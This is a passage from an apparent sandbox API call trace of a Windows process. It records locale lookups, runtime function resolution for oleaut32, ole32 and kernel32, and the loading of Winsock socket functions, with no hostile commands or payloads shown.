lpLCData="Tuesday") returned 8 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | 
out: lpLCData="Saturday") returned 9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: 
lpLCData="August") returned 7 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 
9 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0100.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0100.759] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0100.759] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0100.759] GetProcAddress (hModule=0x76c10000, 
lpProcName="VarIdiv") returned 0x76c8f00a [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0100.759] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0100.760] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0100.760] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0100.760] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0100.760] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0100.760] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15754919435) returned 1 [0100.760] GetTickCount () returned 0x24134 [0100.760] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, 
wSecond=0xe, wMilliseconds=0xd6)) [0100.760] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xe, wMilliseconds=0xd6)) [0100.760] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15754933087) returned 1 [0100.760] GetTickCount () returned 0x24134 [0100.760] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xe, wMilliseconds=0xd6)) [0100.760] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xe, wMilliseconds=0xd6)) [0100.760] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13682bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0100.760] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x135288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", 
lpUsedDefaultChar=0x0) returned 14 [0100.760] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13682bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0100.761] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13682bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0100.761] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13682bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0100.761] GetProcAddress 
(hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13682bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0100.761] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0100.761] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x136f48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0100.761] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13682bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", 
lpUsedDefaultChar=0x0) returned 21 [0100.761] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x136f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0100.761] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0100.761] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x136f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0100.761] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0100.761] GetThreadLocale () returned 0x409 [0100.761] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0100.761] GetCurrentThreadId () returned 0xc44 [0100.761] GetCurrentThreadId () returned 0xc44 [0100.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0100.761] GetThreadLocale () returned 0x409 [0100.761] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0100.761] GetThreadLocale () returned 0x409 [0100.761] 
EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0100.762] GetCurrentThreadId () returned 0xc44 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: 
lpLCData="Jan") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: 
lpLCData="Sep") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 
[0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0100.762] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0100.763] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0100.763] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0100.764] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0100.764] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0100.764] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0100.764] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0100.764] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 
0x77384582 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0100.765] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 